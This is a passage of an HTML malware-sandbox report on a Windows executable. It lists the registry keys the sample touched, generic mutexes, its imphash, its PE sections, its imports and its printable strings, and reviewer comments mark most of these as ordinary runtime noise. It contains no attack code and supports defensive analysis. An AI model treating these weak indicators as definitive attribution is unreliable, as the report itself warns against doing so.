HKEY_CLASSES_ROOT\txtfile\CurVer<br />
HKEY_CLASSES_ROOT\txtfile\<br />
HKEY_CLASSES_ROOT\txtfile\\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.txt<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\text<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\text\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\txtfile\\Clsid<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\text\Clsid<br />
HKEY_CLASSES_ROOT\*<br />
HKEY_CLASSES_ROOT\*\Clsid<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\rundll32.exe<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7952-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7952-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7950-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp<br />
HKEY_CLASSES_ROOT\.bmp<br />
HKEY_CLASSES_ROOT\Paint.Picture<br />
HKEY_CLASSES_ROOT\Paint.Picture\CurVer<br />
HKEY_CLASSES_ROOT\Paint.Picture\<br />
HKEY_CLASSES_ROOT\Paint.Picture\\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\image<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\Paint.Picture\\Clsid<br />
HKEY_CLASSES_ROOT\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\Implemented Categories\{00021490-0000-0000-C000-000000000046}<br />
HKEY_CLASSES_ROOT\Paint.Picture\\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\.bmp\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\*\ShellEx\DataHandler<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellImageView<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellImageView<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004_Classes<br />
HKEY_LOCAL_MACHINE\Software\Classes<br />
\REGISTRY\USER<br />
HKEY_LOCAL_MACHINE\Software\Classes\CLSID<br />
CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}<br />
CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\TreatAs<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocServer32<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocServerX86<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\LocalServer32<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocHandler32<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocHandlerX86<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\LocalServer<br />
HKEY_CLASSES_ROOT\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}<br />
HKEY_CLASSES_ROOT\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\TreatAs<br />
CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}<br />
CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\TreatAs<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocServer32<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocServerX86<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\LocalServer32<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocHandler32<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocHandlerX86<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\LocalServer<br />
HKEY_CLASSES_ROOT\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}<br />
HKEY_CLASSES_ROOT\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\TreatAs<br />
CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}<br />
CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\TreatAs<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocServer32<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocServerX86<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\LocalServer32<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocHandler32<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocHandlerX86<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\LocalServer<br />
HKEY_CLASSES_ROOT\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}<br />
HKEY_CLASSES_ROOT\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\TreatAs<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes<br />
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System<br />
HKEY_CURRENT_USER\Software\Microsoft\Command Processor<br />
</div>
</div>
<div class="tab-pane fade" id="summary_mutexes">
<!--
  Behavioural summary: mutex names recorded during the sandbox run.
  NOTE(review): none of these names is specific to the sample. They appear to come
  from WinINet cache handling (_!MSFTHISTORY!_, the c:!...! cache paths and the
  Wininet*Mutex names), text services (CTF.*) and the application compatibility
  shim cache, all of which ordinary programs also create. Treat them as background
  noise rather than host indicators.
-->
<div class="well mono">
_!MSFTHISTORY!_<br />
c:!documents and settings!user!local settings!temporary internet files!content.ie5!<br />
c:!documents and settings!user!cookies!<br />
c:!documents and settings!user!local settings!history!history.ie5!<br />
WininetStartupMutex<br />
WininetConnectionMutex<br />
WininetProxyRegistryMutex<br />
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004<br />
ShimCacheMutex<br />
</div>
</div>
</div>
</div>
</section>


</div>
<div class="tab-pane fade" id="static">
<div class="tabbable tabs">
<!-- Sub-tab selector for the static analysis view: each link's href names the id of the pane it shows (Bootstrap data-toggle="tab"); "Static Analysis" is the pane active on load. -->
<ul class="nav nav-pills" style="margin-bottom: 0;">
<li class="active"><a href="#static_analysis_tab" data-toggle="tab">Static Analysis</a></li>
<li><a href="#static_strings_tab" data-toggle="tab">Strings</a></li>
<li><a href="#static_antivirus_tab" data-toggle="tab">Antivirus</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="static_analysis_tab">
<section id="static_analysis">
<div>
<!-- Import hash (imphash): a hash derived from the PE import table, useful for clustering samples that share the same import layout. Unrelated samples built with the same packer or stub can share a value, so corroborate with other indicators before attributing on this hash alone. -->
<h4>PE Imphash</h4>
<div class="well">084dd3811114fd1d3f9b5fb02bddd9cc</div>
</div>
<hr />


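<div>
<!--
  PE section table of the submitted file: one row per section with its virtual
  address and size, on-disk (raw) size and entropy.
  Reading guide: entropy is reported on a 0 to 8 scale, and values close to 8 usually
  point to compressed or encrypted data. The three sections here stay below 7, carry
  conventional names and have raw sizes close to their virtual sizes, so the static
  layout gives no clear packer signal. That does not rule out unpacking at run time;
  use the behavioural tabs to judge what the sample actually does.
-->
<h4>Sections</h4>
<div id="pe_sections">
<table class="table table-striped table-bordered">
<!-- Header row sits in thead with scope="col" so assistive technology can tie each value to its column. -->
<thead>
<tr>
<th scope="col">Name</th>
<th scope="col">Virtual Address</th>
<th scope="col">Virtual Size</th>
<th scope="col">Size of Raw Data</th>
<th scope="col">Entropy</th>
</tr>
</thead>
<tbody>
<tr>
<td>.text</td>
<td>0x00001000</td>
<td>0x0002b585</td>
<td>0x0002c000</td>
<td>6.63120932236</td>
</tr>
<tr>
<td>.rdata</td>
<td>0x0002d000</td>
<td>0x00003c7c</td>
<td>0x00004000</td>
<td>5.31644360797</td>
</tr>
<tr>
<td>.data</td>
<td>0x00031000</td>
<td>0x0000255c</td>
<td>0x00002000</td>
<td>4.15630838234</td>
</tr>
</tbody>
</table>
</div>
</div>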
<hr />


<div>
<h4>Imports</h4>
<div id="pe_imports">
<div class="well">
<!--
  Imports from USER32.dll: an address column followed by the imported function name,
  each name linked to an MSDN search for that function (the links use plain http).
  NOTE(review): every function in this list is GUI-related (windowing, menus, dialogs,
  painting, clipboard, cursor). None maps to the file, registry or cryptography
  activity shown in the behavioural summary, which may mean those APIs are resolved
  at run time or belong to a payload unpacked in memory. Confirm against the API
  trace before drawing conclusions from the import table alone.
-->
<div><strong>Library USER32.dll</strong>:</div>
<div>&bull; <span class="mono">0x42d15c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetParent">SetParent</a></span></div>
<div>&bull; <span class="mono">0x42d160 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=UpdateWindow">UpdateWindow</a></span></div>
<div>&bull; <span class="mono">0x42d164 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EnableMenuItem">EnableMenuItem</a></span></div>
<div>&bull; <span class="mono">0x42d168 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=BeginPaint">BeginPaint</a></span></div>
<div>&bull; <span class="mono">0x42d16c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetFocus">GetFocus</a></span></div>
<div>&bull; <span class="mono">0x42d170 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=MapWindowPoints">MapWindowPoints</a></span></div>
<div>&bull; <span class="mono">0x42d174 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetWindowTextA">SetWindowTextA</a></span></div>
<div>&bull; <span class="mono">0x42d178 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EmptyClipboard">EmptyClipboard</a></span></div>
<div>&bull; <span class="mono">0x42d17c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetWindowLongA">GetWindowLongA</a></span></div>
<div>&bull; <span class="mono">0x42d180 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SendMessageA">SendMessageA</a></span></div>
<div>&bull; <span class="mono">0x42d184 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LoadIconA">LoadIconA</a></span></div>
<div>&bull; <span class="mono">0x42d188 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetMenuItemInfoW">SetMenuItemInfoW</a></span></div>
<div>&bull; <span class="mono">0x42d18c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetRectEmpty">SetRectEmpty</a></span></div>
<div>&bull; <span class="mono">0x42d190 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDCEx">GetDCEx</a></span></div>
<div>&bull; <span class="mono">0x42d194 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=DrawFocusRect">DrawFocusRect</a></span></div>
<div>&bull; <span class="mono">0x42d198 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCursorPos">GetCursorPos</a></span></div>
<div>&bull; <span class="mono">0x42d19c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDlgItemInt">GetDlgItemInt</a></span></div>
<div>&bull; <span class="mono">0x42d1a0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TranslateMessage">TranslateMessage</a></span></div>
<div>&bull; <span class="mono">0x42d1a4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LoadStringW">LoadStringW</a></span></div>
<div>&bull; <span class="mono">0x42d1a8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ShowWindowAsync">ShowWindowAsync</a></span></div>
<div>&bull; <span class="mono">0x42d1ac <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CreateWindowExA">CreateWindowExA</a></span></div>
<div>&bull; <span class="mono">0x42d1b0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ChildWindowFromPoint">ChildWindowFromPoint</a></span></div>
<div>&bull; <span class="mono">0x42d1b4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsChild">IsChild</a></span></div>
<div>&bull; <span class="mono">0x42d1b8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ReleaseDC">ReleaseDC</a></span></div>
<div>&bull; <span class="mono">0x42d1bc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetCursor">SetCursor</a></span></div>
<div>&bull; <span class="mono">0x42d1c0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetRect">SetRect</a></span></div>
<div>&bull; <span class="mono">0x42d1c4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=MessageBoxW">MessageBoxW</a></span></div>
<div>&bull; <span class="mono">0x42d1c8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDC">GetDC</a></span></div>
</div>
<!--
  Imports from KERNEL32.dll: each row gives an address (presumably the import address table slot) and the
  imported function name, linked to an MSDN search for that name.
  NOTE(review): most of these names (heap, TLS, locale, critical section, environment and startup calls) are what
  the Microsoft C runtime itself typically imports, and that usually includes IsDebuggerPresent,
  SetUnhandledExceptionFilter, VirtualAlloc, GetTickCount and LoadLibraryA / GetProcAddress. Their presence alone
  is weak evidence of anti-debugging or dynamic API resolution; confirm against the behavioural trace.
-->
<div class="well">
<div><strong>Library KERNEL32.dll</strong>:</div>
<div>&bull; <span class="mono">0x42d000 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStartupInfoW">GetStartupInfoW</a></span></div>
<div>&bull; <span class="mono">0x42d004 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CompareStringW">CompareStringW</a></span></div>
<div>&bull; <span class="mono">0x42d008 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CompareStringA">CompareStringA</a></span></div>
<div>&bull; <span class="mono">0x42d00c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetTimeZoneInformation">GetTimeZoneInformation</a></span></div>
<div>&bull; <span class="mono">0x42d010 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetLocaleInfoW">GetLocaleInfoW</a></span></div>
<div>&bull; <span class="mono">0x42d014 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapSize">HeapSize</a></span></div>
<div>&bull; <span class="mono">0x42d018 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LCMapStringW">LCMapStringW</a></span></div>
<div>&bull; <span class="mono">0x42d01c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=WideCharToMultiByte">WideCharToMultiByte</a></span></div>
<div>&bull; <span class="mono">0x42d020 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LCMapStringA">LCMapStringA</a></span></div>
<div>&bull; <span class="mono">0x42d024 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStringTypeW">GetStringTypeW</a></span></div>
<div>&bull; <span class="mono">0x42d028 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStringTypeA">GetStringTypeA</a></span></div>
<div>&bull; <span class="mono">0x42d02c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsValidCodePage">IsValidCodePage</a></span></div>
<div>&bull; <span class="mono">0x42d030 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsValidLocale">IsValidLocale</a></span></div>
<div>&bull; <span class="mono">0x42d034 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EnumSystemLocalesA">EnumSystemLocalesA</a></span></div>
<div>&bull; <span class="mono">0x42d038 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetLocaleInfoA">GetLocaleInfoA</a></span></div>
<div>&bull; <span class="mono">0x42d03c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetUserDefaultLCID">GetUserDefaultLCID</a></span></div>
<div>&bull; <span class="mono">0x42d040 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDateFormatA">GetDateFormatA</a></span></div>
<div>&bull; <span class="mono">0x42d044 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetTimeFormatA">GetTimeFormatA</a></span></div>
<div>&bull; <span class="mono">0x42d048 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapReAlloc">HeapReAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d04c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InitializeCriticalSection">InitializeCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d050 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InterlockedExchange">InterlockedExchange</a></span></div>
<div>&bull; <span class="mono">0x42d054 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetConsoleCtrlHandler">SetConsoleCtrlHandler</a></span></div>
<div>&bull; <span class="mono">0x42d058 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetOEMCP">GetOEMCP</a></span></div>
<div>&bull; <span class="mono">0x42d05c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetACP">GetACP</a></span></div>
<div>&bull; <span class="mono">0x42d060 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCPInfo">GetCPInfo</a></span></div>
<div>&bull; <span class="mono">0x42d064 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FatalAppExitA">FatalAppExitA</a></span></div>
<div>&bull; <span class="mono">0x42d068 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsDebuggerPresent">IsDebuggerPresent</a></span></div>
<div>&bull; <span class="mono">0x42d06c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=RaiseException">RaiseException</a></span></div>
<div>&bull; <span class="mono">0x42d070 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetUnhandledExceptionFilter">SetUnhandledExceptionFilter</a></span></div>
<div>&bull; <span class="mono">0x42d074 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetEnvironmentStrings">GetEnvironmentStrings</a></span></div>
<div>&bull; <span class="mono">0x42d078 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentThread">GetCurrentThread</a></span></div>
<div>&bull; <span class="mono">0x42d07c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=VirtualAlloc">VirtualAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d080 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetVersionExA">GetVersionExA</a></span></div>
<div>&bull; <span class="mono">0x42d084 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetProcAddress">GetProcAddress</a></span></div>
<div>&bull; <span class="mono">0x42d088 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LoadLibraryA">LoadLibraryA</a></span></div>
<div>&bull; <span class="mono">0x42d08c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FreeLibrary">FreeLibrary</a></span></div>
<div>&bull; <span class="mono">0x42d090 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetModuleFileNameA">GetModuleFileNameA</a></span></div>
<div>&bull; <span class="mono">0x42d094 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=lstrlenW">lstrlenW</a></span></div>
<div>&bull; <span class="mono">0x42d098 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapAlloc">HeapAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d09c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CloseHandle">CloseHandle</a></span></div>
<div>&bull; <span class="mono">0x42d0a0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=MultiByteToWideChar">MultiByteToWideChar</a></span></div>
<div>&bull; <span class="mono">0x42d0a4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EnterCriticalSection">EnterCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d0a8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentProcess">GetCurrentProcess</a></span></div>
<div>&bull; <span class="mono">0x42d0ac <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FindFirstFileW">FindFirstFileW</a></span></div>
<div>&bull; <span class="mono">0x42d0b0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStdHandle">GetStdHandle</a></span></div>
<div>&bull; <span class="mono">0x42d0b4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CreateFileA">CreateFileA</a></span></div>
<div>&bull; <span class="mono">0x42d0b8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LocalFree">LocalFree</a></span></div>
<div>&bull; <span class="mono">0x42d0bc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetVersionExW">GetVersionExW</a></span></div>
<div>&bull; <span class="mono">0x42d0c0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCommandLineW">GetCommandLineW</a></span></div>
<div>&bull; <span class="mono">0x42d0c4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CreateEventW">CreateEventW</a></span></div>
<div>&bull; <span class="mono">0x42d0c8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LeaveCriticalSection">LeaveCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d0cc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapDestroy">HeapDestroy</a></span></div>
<div>&bull; <span class="mono">0x42d0d0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=Sleep">Sleep</a></span></div>
<div>&bull; <span class="mono">0x42d0d4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TerminateProcess">TerminateProcess</a></span></div>
<div>&bull; <span class="mono">0x42d0d8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=RtlUnwind">RtlUnwind</a></span></div>
<div>&bull; <span class="mono">0x42d0dc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapFree">HeapFree</a></span></div>
<div>&bull; <span class="mono">0x42d0e0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetProcessHeap">GetProcessHeap</a></span></div>
<div>&bull; <span class="mono">0x42d0e4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetEnvironmentVariableA">SetEnvironmentVariableA</a></span></div>
<div>&bull; <span class="mono">0x42d0e8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetModuleHandleA">GetModuleHandleA</a></span></div>
<div>&bull; <span class="mono">0x42d0ec <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsGetValue">TlsGetValue</a></span></div>
<div>&bull; <span class="mono">0x42d0f0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsAlloc">TlsAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d0f4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsSetValue">TlsSetValue</a></span></div>
<div>&bull; <span class="mono">0x42d0f8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsFree">TlsFree</a></span></div>
<div>&bull; <span class="mono">0x42d0fc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InterlockedIncrement">InterlockedIncrement</a></span></div>
<div>&bull; <span class="mono">0x42d100 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetLastError">SetLastError</a></span></div>
<div>&bull; <span class="mono">0x42d104 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentThreadId">GetCurrentThreadId</a></span></div>
<div>&bull; <span class="mono">0x42d108 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetLastError">GetLastError</a></span></div>
<div>&bull; <span class="mono">0x42d10c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InterlockedDecrement">InterlockedDecrement</a></span></div>
<div>&bull; <span class="mono">0x42d110 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ExitProcess">ExitProcess</a></span></div>
<div>&bull; <span class="mono">0x42d114 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=WriteFile">WriteFile</a></span></div>
<div>&bull; <span class="mono">0x42d118 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=UnhandledExceptionFilter">UnhandledExceptionFilter</a></span></div>
<div>&bull; <span class="mono">0x42d11c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetModuleFileNameW">GetModuleFileNameW</a></span></div>
<div>&bull; <span class="mono">0x42d120 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FreeEnvironmentStringsA">FreeEnvironmentStringsA</a></span></div>
<div>&bull; <span class="mono">0x42d124 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FreeEnvironmentStringsW">FreeEnvironmentStringsW</a></span></div>
<div>&bull; <span class="mono">0x42d128 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetEnvironmentStringsW">GetEnvironmentStringsW</a></span></div>
<div>&bull; <span class="mono">0x42d12c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCommandLineA">GetCommandLineA</a></span></div>
<div>&bull; <span class="mono">0x42d130 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetHandleCount">SetHandleCount</a></span></div>
<div>&bull; <span class="mono">0x42d134 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetFileType">GetFileType</a></span></div>
<div>&bull; <span class="mono">0x42d138 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStartupInfoA">GetStartupInfoA</a></span></div>
<div>&bull; <span class="mono">0x42d13c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=DeleteCriticalSection">DeleteCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d140 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapCreate">HeapCreate</a></span></div>
<div>&bull; <span class="mono">0x42d144 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=VirtualFree">VirtualFree</a></span></div>
<div>&bull; <span class="mono">0x42d148 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=QueryPerformanceCounter">QueryPerformanceCounter</a></span></div>
<div>&bull; <span class="mono">0x42d14c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetTickCount">GetTickCount</a></span></div>
<div>&bull; <span class="mono">0x42d150 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentProcessId">GetCurrentProcessId</a></span></div>
<div>&bull; <span class="mono">0x42d154 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetSystemTimeAsFileTime">GetSystemTimeAsFileTime</a></span></div>
</div>
</div>
</div>
<hr />

</section>

</div>
<!--
  Static strings tab: printable strings found in the sample, one per <div>.
  NOTE(review): most of what follows looks like Microsoft Visual C++ runtime boilerplate and says little about
  what the sample does; the short mixed-case entries at the top are presumably code bytes that happen to be
  printable. Treat the list as supporting context, not as a behavioural finding.
-->
<div class="tab-pane fade" id="static_strings_tab">
<section id="static_strings">
<div class="well" style="font-family: monospace;">
<div>!This program cannot be run in DOS mode.</div>
<div>`.rdata</div>
<div>@.data</div>
<div>QQSVWd</div>
<div>;t$,v-</div>
<div>UQPXY]Y[</div>
<div>HtHu4j</div>
<div>s[S;7|G;w</div>
<div>tR99u2</div>
<div>tehsgA</div>
<div>YYuTVWhO{A</div>
<div>&gt;=Yt/j</div>
<div>4~f9.u</div>
<div>QQSVWh</div>
<div>@@f98u</div>
<div>@@f98u</div>
<div>j(j ^V</div>
<div>F9=44C</div>
